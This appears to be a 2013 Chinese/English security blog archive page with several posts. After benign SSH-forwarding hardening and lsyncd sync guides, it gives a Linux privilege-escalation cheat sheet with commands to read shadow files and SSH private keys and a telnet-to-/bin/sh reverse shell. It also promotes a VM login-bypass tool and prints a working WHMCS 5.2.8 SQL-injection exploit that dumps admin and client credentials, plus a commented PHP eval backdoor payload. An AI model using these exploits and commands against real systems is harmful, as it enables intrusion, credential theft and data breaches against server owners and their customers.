Day: 2013 年 10 月 21 日

Keep an Eye on SSH Forwarding!

by Orange

OpenSSH is a wonderful tool box. The main purpose is to establish encrypted connections (SSH means Secure SHell) on a remote UNIX machine and, once authenticated, to spawn a shell to perform remote administration. Running on port 22 (default), the client (ssh) and the server (sshd) exchange encrypted information (what you type and the result of your command). I’ll not review the long list of options available with SSH but let’s focus on a particular feature: tunneling.

By default, sshd (the server) has the flag AllowTcpForwarding turned on (I won’t start a debate here about this default setting). “TCP Forwarding” allows you to encapsulate any other protocol (based on TCP of course) inside an already established SSH connection. It’s very useful to increase the security of any unsecured protocol exchanging data in clear text (example: to check a mailbox via the POP3 or IMAP protocol). TCP Forwarding is also a common way to “hide” your activity on the network. Here is an example:

# ssh -f -N -L 1100:localhost:110 -f user@pop3.company.com
user@pop3.company.com's password: 
# telnet localhost 1100
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
+OK Solid POP3 server ready
quit
+OK session ended
Connection closed by foreign host.

If you want to read more about tunnels, check the following tutorial.

But the ssh client has a much more interesting feature: dynamic port forwarding. When you connect to the remote host and specify a”-D ” argument, the remote ssh server acts as a SOCKS proxy! Example:

# ssh -f -N -D 9001 user@server.company.com

Starting from now, all applications compatible with SOCKS proxies can use the proxy running on 127.0.0.1:9999! Here is an example on FireFox:

firefox-proxy

Click to enlarge

Configured like this, your FireFox will send all HTTP traffic though the remote server via the SSH session. The server will connect to the final website and send the HTTP requests. Really nice! But there are some security concerns:

  • The UNIX server will generate a lot of traffic from the Internet. There is a risk of high resources consumption (bandwidth and/or CPU).
  • As connections will originate from the UNIX server itself, the logged IP address on remote services will be the one of the UNIX server. There is a risk in case of abuse (hidden IP address).
  • By default, the SSH daemon permits all protocols to be forwarded. Some users may abuse your security policy by encapsulating unexpected protocols (Instant Messenging is a good example).

Here follows some steps to use the SSH tunnel in a safe way. First of all, if you don’t really need this feature, disable it! In /etc/ssh/sshd_config, set AllowTcpForwarding to off and restart the sshd process.

Logging

By default, the SSH daemon does not log the sessions established via a tunnel. To show them, you need to run the sshd in debug mode (-d). This is not acceptable in an operational environment. Here is a quick patch to log all outgoing sessions initiated by the sshd with a mapping to the UID (UserID). In serverloop.c, patch the function server_request_direct_tcpip() like this:

915,918d914
<  // BEGIN PATCH TunnelLogging
<  uid_t who;
<  // END PATCH
<
925,930c921,922
<  // BEGIN PATCH TunnelLogging
<  // debug("server_request_direct_tcpip: originator %s port %d, target %s port %d",
<  who = getuid();
<    logit("Tunnel: %s:%d -> %s:%d UID(%d)",
<      originator, originator_port, target, target_port, who);
<  // END PATCH
---
>  debug("server_request_direct_tcpip: originator %s port %d, target %s port %d",
>      originator, originator_port, target, target_port);

For each new TCP session, the following line will be sent to Syslog:

Feb 27 08:03:08 honey sshd[9060]: Tunnel: 127.0.0.1:51209 -> 0.channel26.facebook.com:80 UID(2349)

The patch will allow to correlate who connected and from which IP address.

Restricting the allowed ports

By default, sshd allow to forward TCP sessions to any ports. You can restrict them to specific hosts and/or ports via the PermitOpen parameter (available since release 4.4):

PermitOpen host:port
PermitOpen IPv4_addr:port
PermitOpen [IPv6_addr]:port

Another alternative is to use the local firewall – iptables – to restrict connection initiated by the UNIX server.

Restricting the allowed users or groups

Now that hosts and ports are restricted, it can be useful to restrict who can use the port forwarding feature. Back to the sshd_config man page, let’s have a look at the Match keyword:

Introduces a conditional block. If all of the criteria on the Match line are satisfied, the keywords on the following lines override those set in the global section of the config file, until either another Match line or the end of the file. The arguments to Match are one or more criteria-pattern pairs. The available criteria are User, Group, Host, and Address. Only a subset of keywords may be used on the lines following a Match keyword. Available keywords are AllowTcpForwarding, Banner, ForceCommand, GatewayPorts, GSSApiAuthentication, KbdInteractiveAuthentication, KerberosAuthentication, PasswordAuthentication, PermitOpen, RhostsRSAAuthentication, RSAAuthentication, X11DisplayOffset, X11Forwarding, and X11UseLocalHost.

Here are some example. First let’s restrict the users who are allowed to forward TCP sessions:

AllowTcpForwarding no
Match User john,andy,ted
AllowTcpForwarding yes

Or better, allow specific ports per user groups:

AllowTcpForwarding no
Match Group admins
AllowTcpForwarding yes
Match User john,andy,ted
AllowTcpForwarding yes
PermitOpen 192.168.0.1:443

With this configuration, administrators will be able to open unrestricted connections, specific users will be able to open an IMAP session to a single server and all remaining users won’t be allowed to create tunnels.

Restricting the server Internet connectivity

Finally, restrict the Internet connectivity of your server! Even if you don’t allow TCP Forwarding, it’s a good idea. A server should never have a full direct Internet connectivity. Close everything and open connectivity depending on the needs (example: download some patches via HTTP(S) from specific servers).

使用 lsyncd 同步本地和远程目录

by Orange

自动同步本地服务器(或 VPS)上的目录到另一台或多台远程服务器的办法和工具有很多,最简单的办法可能是用 rsync + cron(参考:用 VPS 给博客做镜像),这种办法有个问题就是 rsync 只能在固定时间间隔里被 cron 调用,如果时间间隔设的太短,频繁 rsync 会增加服务器负担;如果时间间隔设的太长,可能数据不能及时同步。今天介绍的 lsyncd 采用了 Linux 内核(2.6.13 及以后)里的 inotify 触发机制,这种机制可以做到只有在需要(变化)的时候才去同步。lsyncd 密切监测本地服务器上的参照目录,当发现目录下有文件或目录变更后,立刻通知远程服务器,并通过 rsync 或 rsync+ssh 方式实现文件同步。lsyncd 默认同步触发条件是每20秒或者每积累到1000次写入事件就触发一次,当然,这个触发条件可以通过配置参数调整。

lsyncd 已经在 Ubuntu 的官方源里,安装很容易:

$ sudo apt-get update
$ sudo apt-get install lsyncd

lsyncd 安装后没有自动生成所需要的配置文件和目录,需要手动创建:

$ sudo mkdir /etc/lsyncd
$ sudo touch /etc/lsyncd/lsyncd.conf.lua

$ sudo mkdir /var/log/lsyncd
$ sudo touch /var/log/lsyncd/lsyncd.{log,status}

配置 lsyncd,注意 source, host, targetdir 部分,依次是本地需要同步到远程的目录(源头),远程机器的 IP,远程目录(目标):

$ sudo vi /etc/lsyncd/lsyncd.conf.lua
settings {
        logfile = "/var/log/lsyncd/lsyncd.log",
        statusFile = "/var/log/lsyncd/lsyncd.status"
}

sync {
        default.rsyncssh,
        source = "/home/vpsee/local",
        host = "192.168.2.5",
        targetdir = "/remote"
}

配置本地机器和远程机器 root 帐号无密码 ssh 登陆,并在远程机器上(假设 IP 是 192.168.2.5)创建一个 /remote 目录:

$ sudo su
# ssh-keygen -t rsa
# ssh-copy-id root@192.168.2.5

# ssh 192.168.2.5
# mkdir /remote

配置好后就可以在本地机器上启动 lsyncd 服务了,启动服务后本地机器 /home/vpsee/local 下的目录会自动同步到远程机器的 /remote 目录下:

$ sudo service lsyncd restart

除了同步本地目录到远程目录外,lsyncd 还可以轻松做到同步本地目录到本地另一目录,只要修改配置文件就可以了:

$ sudo vi /etc/lsyncd/lsyncd.conf.lua
settings {
        logfile = "/var/log/lsyncd/lsyncd.log",
        statusFile = "/var/log/lsyncd/lsyncd.status"
}

sync {
	default.rsync,
	source = "/home/vpsee/local",
	target = "/localbackup"
}

$ sudo service lsyncd restart

Linux主机本地信息自动采集工具(渗透测试必备)

by Orange

1

LinEnum是一个Linux主机本地信息自动提取的shell脚本,它有超过65项安全检查功能,比如潜在的SUID/GUID文件、Sudo/rhost错误配置等。另外这个脚本还可以根据关键字(比如Password)搜索*.conf和*.log文件,这些功能对于渗透测试人员来说,是非常有用的。

主要功能:

 

1.内核和发行版本
2.系统信息:
主机名
3.网络信息:
IP
路由信息
DNS服务器信息
4.用户信息:
当前用户信息
最近登录用户
枚举所有用户,包括uid/gid信息
列举root账号
检查/etc/passwd中的hash
当前用户操作记录 (i.e .bash_history, .nano_history etc.)
5.版本信息:
Sudo
MYSQL
Postgres
Apache

2

下载地址

Linux提权后获取敏感信息的方法与途径

by Orange

在本文开始之前,我想指出我不是专家。据我所知,在这个庞大的区域,没有一个“神奇”的答案.分享,共享(我的出发点)。下面是一个混合的命令做同样的事情,在不同的地方,或只是一个不同的眼光来看待事物。我知道有更多的“东西”去寻找。这只是一个基本粗略的指南。并不是每一个命令,做好要注重细节.

文中的每行为一条命令,文中有的命令可能在你的主机上敲不出来,因为它可能是在其他版本的linux中所使用的命令。

列举关键点
(Linux)的提权是怎么一回事:

  • 收集 – 枚举,枚举和一些更多的枚举。
  • 过程 – 通过数据排序,分析和确定优先次序。
  • 搜索 – 知道搜索什么和在哪里可以找到漏洞代码。
  • 适应 – 自定义的漏洞,所以它适合。每个系统的工作并不是每一个漏洞“都固定不变”。
  • 尝试 – 做好准备,试验和错误。
  • 操作类型

操作类型是什么版本?

1 cat /etc/issue
2 cat /etc/*-release
3 cat /etc/lsb-release
4 cat /etc/redhat-release

它的内核版本是什么?

1 cat /proc/version  
2 uname -a
3 uname -mrs
4 rpm -q kernel
5 dmesg | grep Linux
6 ls /boot | grep vmlinuz

它的环境变量里有些什么?

1 cat /etc/profile
2 cat /etc/bashrc
3 cat ~/.bash_profile
4 cat ~/.bashrc
5 cat ~/.bash_logout
6 env
7 set

是否有台打印机?

1 lpstat -a
  • 应用与服务

正在运行什么服务?什么样的服务具有什么用户权限?

1 ps aux
2 ps -ef
3 top
4 cat /etc/service

哪些服务具有root的权限?这些服务里你看起来那些有漏洞,进行再次检查!

1 ps aux | grep root
2 ps -ef | grep root

安装了哪些应用程序?他们是什么版本?哪些是当前正在运行的?

1 ls -alh /usr/bin/
2 ls -alh /sbin/
3 dpkg -l
4 rpm -qa
5 ls -alh /var/cache/apt/archivesO
6 ls -alh /var/cache/yum/

Service设置,有任何的错误配置吗?是否有任何(脆弱的)的插件?

01 cat /etc/syslog.conf
02 cat /etc/chttp.conf
03 cat /etc/lighttpd.conf
04 cat /etc/cups/cupsd.conf
05 cat /etc/inetd.conf
06 cat /etc/apache2/apache2.conf
07 cat /etc/my.conf
08 cat /etc/httpd/conf/httpd.conf
09 cat /opt/lampp/etc/httpd.conf
10 ls -aRl /etc/ | awk '$1 ~ /^.*r.*/

主机上有哪些工作计划?

01 crontab -l
02 ls -alh /var/spool/cron
03 ls -al /etc/ | grep cron
04 ls -al /etc/cron*
05 cat /etc/cron*
06 cat /etc/at.allow
07 cat /etc/at.deny
08 cat /etc/cron.allow
09 cat /etc/cron.deny
10 cat /etc/crontab
11 cat /etc/anacrontab
12 cat /var/spool/cron/crontabs/root

主机上可能有哪些纯文本用户名和密码?

1 grep -i user [filename]
2 grep -i pass [filename]
3 grep -C 5 "password" [filename]
4 find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla
  • 通信与网络

NIC(s),系统有哪些?它是连接到哪一个网络?

1 /sbin/ifconfig -a
2 cat /etc/network/interfaces
3 cat /etc/sysconfig/network

网络配置设置是什么?网络中有什么样的服务器?DHCP服务器?DNS服务器?网关?

1 cat /etc/resolv.conf
2 cat /etc/sysconfig/network
3 cat /etc/networks
4 iptables -L
5 hostname
6 dnsdomainname

其他用户主机与系统的通信?

01 lsof -i
02 lsof -i :80
03 grep 80 /etc/services
04 netstat -antup
05 netstat -antpx
06 netstat -tulpn
07 chkconfig --list
08 chkconfig --list | grep 3:on
09 last
10 w

缓存?IP和/或MAC地址?

1 arp -e
2 route
3 /sbin/route -nee

数据包可能嗅探吗?可以看出什么?监听流量

1 # tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
2 tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21

你如何get一个shell?你如何与系统进行交互?

# http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

1 nc -lvp 4444    # Attacker. 输入 (命令)
2 nc -lvp 4445    # Attacker. 输出(结果)

telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445    # 在目标系统上. 使用 攻击者的IP!

如何端口转发?(端口重定向)

# rinetd

# fpipe

1 # FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
2 FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

#ssh

1 # ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
2 ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
3 ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port

#mknod

1 # mknod backpipe p ; nc -l -p [remote port] < backpipe  | nc [local IP] [local port] >backpipe
2 mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe    # Port Relay
3 mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
4 mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)

建立隧道可能吗?本地,远程发送命令

1 ssh -D 127.0.0.1:9050 -N [username]@[ip]
2 proxychains ifconfig
  • 秘密信息和用户

你是谁?哪个id登录?谁已经登录?还有谁在这里?谁可以做什么呢?

1 id
2 who
3 w
4 last
5 cat /etc/passwd | cut -d:    # List of users
6 grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
7 awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
8 cat /etc/sudoers
9 sudo -l

可以找到什么敏感文件?

1 cat /etc/passwd
2 cat /etc/group
3 cat /etc/shadow
4 ls -alh /var/mail/

什么有趣的文件在home/directorie(S)里?如果有权限访问

1 ls -ahlR /root/
2 ls -ahlR /home/

是否有任何密码,脚本,数据库,配置文件或日志文件?密码默认路径和位置

1 cat /var/apache2/config.inc
2 cat /var/lib/mysql/mysql/user.MYD
3 cat /root/anaconda-ks.cfg

用户做过什么?是否有任何密码呢?他们有没有编辑什么?

1 cat ~/.bash_history
2 cat ~/.nano_history
3 cat ~/.atftp_history
4 cat ~/.mysql_history
5 cat ~/.php_history

可以找到什么样的用户信息

1 cat ~/.bashrc
2 cat ~/.profile
3 cat /var/mail/root
4 cat /var/spool/mail/root

private-key 信息能否被发现?

01 cat ~/.ssh/authorized_keys
02 cat ~/.ssh/identity.pub
03 cat ~/.ssh/identity
04 cat ~/.ssh/id_rsa.pub
05 cat ~/.ssh/id_rsa
06 cat ~/.ssh/id_dsa.pub
07 cat ~/.ssh/id_dsa
08 cat /etc/ssh/ssh_config
09 cat /etc/ssh/sshd_config
10 cat /etc/ssh/ssh_host_dsa_key.pub
11 cat /etc/ssh/ssh_host_dsa_key
12 cat /etc/ssh/ssh_host_rsa_key.pub
13 cat /etc/ssh/ssh_host_rsa_key
14 cat /etc/ssh/ssh_host_key.pub
15 cat /etc/ssh/ssh_host_key
  • 文件系统

哪些用户可以写配置文件在/ etc /?能够重新配置服务?

1 ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone
1 ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null        # Owner
1 ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group
1 ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null          # Other
1 find /etc/ -readable -type f 2>/dev/null                         # Anyone
2 find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone

在/ var /有什么可以发现?

1 ls -alh /var/log
2 ls -alh /var/mail
3 ls -alh /var/spool
4 ls -alh /var/spool/lpd
5 ls -alh /var/lib/pgsql
6 ls -alh /var/lib/mysql
7 cat /var/lib/dhcp3/dhclient.leases

网站上的任何隐藏配置/文件?配置文件与数据库信息?

1 ls -alhR /var/www/
2 ls -alhR /srv/www/htdocs/
3 ls -alhR /usr/local/www/apache22/data/
4 ls -alhR /opt/lampp/htdocs/
5 ls -alhR /var/www/html/

有什么在日志文件里?(什么能够帮助到“本地文件包含”?)

# http://www.thegeekstuff.com/2011/08/linux-var-log-files/

01 cat /etc/httpd/logs/access_log
02 cat /etc/httpd/logs/access.log
03 cat /etc/httpd/logs/error_log
04 cat /etc/httpd/logs/error.log
05 cat /var/log/apache2/access_log
06 cat /var/log/apache2/access.log
07 cat /var/log/apache2/error_log
08 cat /var/log/apache2/error.log
09 cat /var/log/apache/access_log
10 cat /var/log/apache/access.log
11 cat /var/log/auth.log
12 cat /var/log/chttp.log
13 cat /var/log/cups/error_log
14 cat /var/log/dpkg.log
15 cat /var/log/faillog
16 cat /var/log/httpd/access_log
17 cat /var/log/httpd/access.log
18 cat /var/log/httpd/error_log
19 cat /var/log/httpd/error.log
20 cat /var/log/lastlog
21 cat /var/log/lighttpd/access.log
22 cat /var/log/lighttpd/error.log
23 cat /var/log/lighttpd/lighttpd.access.log
24 cat /var/log/lighttpd/lighttpd.error.log
25 cat /var/log/messages
26 cat /var/log/secure
27 cat /var/log/syslog
28 cat /var/log/wtmp
29 cat /var/log/xferlog
30 cat /var/log/yum.log
31 cat /var/run/utmp
32 cat /var/webmin/miniserv.log
33 cat /var/www/logs/access_log
34 cat /var/www/logs/access.log
1 ls -alh /var/lib/dhcp3/
2 ls -alh /var/log/postgresql/
3 ls -alh /var/log/proftpd/
4 ls -alh /var/log/samba/
5 # auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp(有什么文件?log.系统引导......)

如果命令限制,你可以打出哪些突破它的限制?

1 python -c 'import pty;pty.spawn("/bin/bash")'
1 echo os.system('/bin/bash')
1 /bin/sh -i

如何安装文件系统?

1 mount
2 df -h

是否有挂载的文件系统?

1 cat /etc/fstab

什么是高级Linux文件权限使用?Sticky bits, SUID 和GUID

1 find / -perm -1000 -type d 2>/dev/null    # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
2 find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the  group, not the user who started it.
3 find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the  owner, not the user who started it.
4 find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
5 for i in `locate -r "bin$"`; do find $i ( -perm -4000 -o -perm -2000 ) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
6
7 # findstarting at root (/), SGIDorSUID, not Symbolic links, only 3 folders deep, list with more detail and hideany errors (e.g. permission denied)
8
9 find/-perm -g=s-o-perm -4000! -type l-maxdepth 3 -exec ls -ld {} ;2>/dev/null

在哪些目录可以写入和执行呢?几个“共同”的目录:/ tmp目录,/var / tmp目录/ dev /shm目录

1 find / -writable -type d 2>/dev/null        # world-writeable folders
2 find / -perm -222 -type d 2>/dev/null      # world-writeable folders
3 find / -perm -o+w -type d 2>/dev/null    # world-writeable folders
4 find / -perm -o+x -type d 2>/dev/null    # world-executable folders
5 find / ( -perm -o+w -perm -o+x ) -type d 2>/dev/null   # world-writeable & executable folders
6 Any "problem" files?可写的的,“没有使用"的文件
7 find / -xdev -type d ( -perm -0002 -a ! -perm -1000 ) -print   # world-writeable files
8 find /dir -xdev ( -nouser -o -nogroup ) -print   # Noowner files
  • 准备和查找漏洞利用代码

安装了什么开发工具/语言/支持?

1 find / -name perl*
2 find / -name python*
3 find / -name gcc*
4 find / -name cc

如何上传文件?

1 find / -name wget
2 find / -name nc*
3 find / -name netcat*
4 find / -name tftp*
5 find / -name ftp

查找exploit代码

http://www.exploit-db.com

http://1337day.com

http://www.securiteam.com

http://www.securityfocus.com

http://www.exploitsearch.net

http://metasploit.com/modules/

http://securityreason.com

http://seclists.org/fulldisclosure/

http://www.google.com

查找更多有关漏洞的信息

http://www.cvedetails.com

http://packetstormsecurity.org/files/cve/[CVE]

http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]]http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]

http://www.vulnview.com/cve-details.php?cvename=[CVE]]http://www.vulnview.com/cve-details.php?cvename=[CVE]

http://www.91ri.org/

(快速)“共同的“exploit,预编译二进制代码文件

http://tarantula.by.ru/localroot/

http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/

上面的信息很难吗?

快去使用第三方脚本/工具来试试吧!

系统怎么打内核,操作系统,所有应用程序,插件和Web服务的最新补丁?

1 apt-get update && apt-get upgrade
2 yum update

服务运行所需的最低的权限?

例如,你需要以root身份运行MySQL?

能够从以下网站找到自动运行的脚本?!

unix-privesc-check

http://labs.portcullis.co.uk/application/enum4linux/

http://bastille-linux.sourceforge.net

  • (快速)指南和链接

例如

http://www.0daysecurity.com/penetration-testing/enumeration.html

http://www.microloft.co.uk/hacking/hacking3.htm

其他

http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf

http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf

http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html

相关文章《linux下的基本渗透方法-实战》《总结Linux的一些渗透技巧

绕过VMware虚拟机登录认证神器—VMInjector

by Orange

VMInjector是一个绕过VMware Wordstation/Player上虚拟机登录认证的工具.支持当前大部分主流操作系统。它的原理是直接操作内存的方式来绕过登录认证。所以这种内存补丁的方式是不持久的,虚拟机重启之后会恢复正常的密码验证功能。

利用条件:

 

1, 宿主机需要是windows(有管理员权限)
2, 虚拟化软件是VMware workstation或者player
3, 存在锁定的虚拟机

 

支持的版本:

宿主机支持32位和64位的windows,虚拟机支持win7,xin xp,MAC OS X,ubuntu大部分版本.

在64位win7主机,vmware 7.1.0,32位xp虚拟机测试通过

下载地址

 

测试心得:

github提供的源码中是用python脚本来注入DLL,我用python2.7.5,psutil模块1.1最新版,遍历主机进程的时候存在
权限不够的问题.(貌似是psutil模块问题?).而且测试了多次都是注入失败.后来发现作者博客里演示的时候用的是编译好的exe.这两个exe在
github上也有,只是后来被作者删掉了.不知道为什么.

所以,需要回滚到github上一个版本来获取exe执行文件。

git clone https://github.com/batistam/VMInjector
cd VMInjector
git rebase -i HEAD~2 (在编辑界面删除第2行文字!!!)

目的是撤销最近的一次提交.这样被删掉的exe文件就回来了.

root@bt:~/VMInjector# ls
LICENSE  README  vminjector  vminjector-src
root@bt:~/VMInjector# git rebase -i HEAD~2
Successfully rebased and updated refs/heads/master.
root@bt:~/VMInjector# 
root@bt:~/VMInjector# 
root@bt:~/VMInjector# ls
LICENSE  vminjector            vminjector64-exe.rar
README   vminjector32-exe.rar  vminjector-src

使用方法命令行下执行,选择需要解锁的虚拟机然后选择操作系统版本.然后再虚拟机登录界面直接回车,不需要密码就可以登录了。

 

WHMCS 5.2.8 EXP

by Orange

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
#!/usr/bin/env python
# 2013/10/18 - WHMCS <=5.2.8 SQL Injection # http://localhost.re/p/whmcs-528-vulnerability

url = 'http://client.target.com/'

import urllib, re, sys
from urllib2 import Request, urlopen
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

def exploit(sql):
sqlUnion = '-1 union select 1,0,0,0,0,0,0,0,0,0,0,%s,0,0,0,0,0,0,0,0,0,0,0#' % sql
print "Doing stuff: %s" % sqlUnion
#you could exploit any file that does a select, I randomly chose viewticket.php
r = urlopen(Request('%sviewticket.php' % url, data="tid[sqltype]=TABLEJOIN&tid[value]=%s" % sqlUnion, headers={"User-agent": ua})).read()
return re.search(r'

(.*?)

', r, re.DOTALL).group(1).strip()

#get admins
print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)')

#get users
count = int(exploit('(SELECT COUNT(id) FROM tblclients)'))
print "User count %d" % count
for i in range(count):
print exploit('(SELECT CONCAT(id,0x3a,firstname,0x3a,lastname,0x3a,address1,0x3a,address2,0x3a,city,0x3a,country,0x3a,ip,0x3a,email,0x3a,password) FROM tblclients LIMIT %d,1)' % i)

#are you evil? yes, you are!
#php = "1';eval($_REQUEST['lol_whmcs']);#"
#r = urlopen(Request('%sadmin/licenseerror.php?updatekey=true&whitelisted=1&newlicensekey=%s&match=1&username[sqltype]=TABLEJOIN&username[value]=-1||1=1%%23' % (url, urllib.quote_plus(php)), headers={"User-agent": ua})).read()